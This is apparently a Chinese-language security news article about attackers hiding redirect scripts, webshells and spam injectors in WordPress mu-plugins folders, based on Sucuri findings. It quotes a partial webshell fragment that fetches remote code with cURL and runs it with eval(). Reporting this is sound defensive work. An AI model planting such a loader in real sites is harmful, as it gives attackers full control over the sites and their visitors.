文
章
目
录
章
目
录
最近,安全研究人员发现在WordPress网站中,威胁行为者正蓄意将恶意代码隐匿于mu – plugins目录内。这一情况引发了安全领域的高度关注,因为mu – plugins目录会随着WordPress的启动自动加载,这就为恶意代码的潜藏提供了绝佳的环境,使得检测和清除工作变得异常艰难。
恶意软件的类型与危害
攻击者在mu – plugins文件夹中部署了多种恶意软件,这些恶意软件看似合法,实则暗藏玄机。
- 重定向脚本:会将毫无防备的网站访客重定向到有害域名,使访客在不知情的情况下陷入危险。
- Webshell:它能赋予攻击者远程代码执行的能力,是极具威胁的一种恶意软件。
- 垃圾邮件注入器:可以操纵网站内容,用于分发不需要的材料,严重影响网站的正常运营。
Sucuri的研究人员深入检测分析后发现,这些恶意软件变种采用了复杂的技术手段,精心设计以躲避搜索引擎爬虫和特权用户的检测,持续隐藏恶意行为的同时,对目标网站造成了极大的破坏。感染恶意脚本的网站面临着诸多严重后果,比如声誉受损,潜在的数据被盗取风险,恶意软件还可能传播给网站访客,甚至网站内容会被未经授权地修改。其中,危害最大的恶意软件变种能让攻击者持续访问被攻陷的网站,为后续长期的恶意利用创造条件。
Webshell的威胁剖析
在已发现的恶意软件变种中,伪装成合法WordPress插件文件的Webshell尤其令人担忧。它被放置在“wp – content/mu – plugins/index.php”位置,暗藏恶意代码。以下是一段关键代码:
if (curl_errno($connectionHandle))
die('cURL error occurred:. curl_error($connectionHandle));
}
curl_close($connectionHandle);
eval("?>". $retrievedCode);
在这段代码中,恶意软件借助PHP的eval()函数,执行从远程服务器获取的任意代码。这意味着攻击者能够以与Web服务器相同的权限在网站上运行命令,从而完全攻陷网站。一旦这个后门建立,攻击者便可以肆意上传文件、删除网站内容,甚至访问敏感信息,将被攻陷的网站作为进一步攻击访客和连接系统的跳板。
WordPress网站的管理者务必提高警惕,加强对mu – plugins目录的安全监控与防护,定期检查目录内的文件,及时发现并清除潜在的恶意软件,避免网站遭受攻击。
